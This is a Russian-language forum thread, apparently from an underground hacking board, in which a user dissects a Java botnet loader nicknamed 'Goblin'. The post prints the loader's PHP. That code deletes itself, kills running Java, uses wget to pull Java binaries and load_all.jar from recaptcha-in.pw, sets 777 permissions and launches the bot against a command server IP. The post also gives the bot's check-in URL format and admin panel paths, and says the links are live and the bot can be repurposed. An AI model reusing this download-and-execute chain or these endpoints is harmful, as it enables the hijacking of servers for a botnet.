Неизвестный софт Goblin

Тема в разделе "ВИРУСОЛОГИЯ", создана пользователем zir0diy, 12 авг 2017 в 14:26.

  1. zir0diy
    on

    zir0diy n.N.N.n.n УЧАСТНИКИ

    Сообщения:
    118
    Пол:
    Мужской
    Адрес:
    error
    Репутация:
    24
    Сфера:
    Вирусология
    Неизвестный софт Goblin
    Доброго дня, мой взгляд заинтересовал зверек, которого я прозвал Гоблин исходя из названия файлов. Ничего нормального в голову не пришло, если погуглить , то вылетает такая персона))))
    [​IMG]
    Дми́трий Ю́рьевич Пучко́в — российский писатель, публицист и переводчик, известный под творческим псевдонимом старший оперуполномоченный Goblin. Разработчик компьютерных игр, блогер.Википедия
    Родился: 2 августа 1961 г. (56 лет), Кропивницкий, Украина
    Рост: 5 футов 10 дюймов
    Родители: Юрий Пучков
    Фильмы: Звёздные войны: Буря в стакане


    Это своего рода ботнет (linux и есть развитие под win) с встроенным лоудером и своей админкой, который работает с помощью java. Распространяется он через уязвимость загрузки файлов на сервере, он загружает вредоносные файлы, которое пытается загрузить load_all.jar на сервер и запустит его.

    Код:
    $out = shell_exec("java -version 2>&1");
    preg_match("/version\s+\"1\.(\d+)\./",$out,$matches);
    $ver = 0;
    if($matches)$ver = (int)$matches[1];
    Если это зверь не может найти установленный java на сервере, он загружает бинарные файлы JAVA на сервер.

    Код:
    hell_exec("export JAVA_HOME=".dirname(__FILE__)."/tmp");
    
    shell_exec("rm ".__FILE__);
    
    shell_exec("pkill java");
    if((defined('PHP_INT_SIZE'))&&(PHP_INT_SIZE == 8)){
    shell_exec("wget http://recaptcha-in.pw/64/tmp.tar.gz");
    shell_exec("tar -xzf tmp.tar.gz");
    shell_exec("rm tmp.tar.gz");
    }else{
    shell_exec("wget http://recaptcha-in.pw/32/tmp.tar.gz");
    shell_exec("tar -xzf tmp.tar.gz");
    shell_exec("rm tmp.tar.gz");
    Ссылки актуальные, все можно скачать с ботовода.

    После всех проверок и установок загружает load_all.jar

    Код:
    ChDir ( "TMP / бен");
    Shell_exec ("rm load_all.jar");
    Shell_exec ("wget http: //recaptcha-in.pw/load_all.jar");
    Shell_exec ("chmod 777 -R.");
    Shell_exec ("nohup ./java -jar load_all.jar http: //83.166.243.65/b");
    

    Последняя команда запускает зверя на java и подключается к удаленному командному центру.

    Есть декомпилировать jar: load_all_source_from_jdcore.zip

    Отстук на gate:
    Код:
    String geturl = host + "/b/check?ver=" + struct.Config.ver + "&os=" + base.Hex.StrToUrlHex(System.getProperty("os.name")) + "&java=1&token=" + Helper.getToken() + "&host=" + base.Hex.StrToUrlHex(Helper.getHost());
    Авторизация http: //83.166.243.65/b

    http://83.166.243.65/b/upload/shellfiles/
    http://83.166.243.65/b/upload/builder/jver.txt

    Бегло пробежался, можно заточить под себя.
     

    Вложения:

  2. ARMANI
    off

    ARMANI GUM УЧАСТНИКИ

    Сообщения:
    35
    Пол:
    Мужской
    Адрес:
    MOSCOW
    Репутация:
    2
    Сфера:
    Кардинг
    ti chto kyril?)
     
  3. svinka_pepa
    off

    svinka_pepa Бываю в Норе УЧАСТНИКИ

    Сообщения:
    28
    Пол:
    Мужской
    Адрес:
    2x2
    Репутация:
    4
    Я так понял на никсах с бинарем жава на любых правах будет работать? нободи, апач?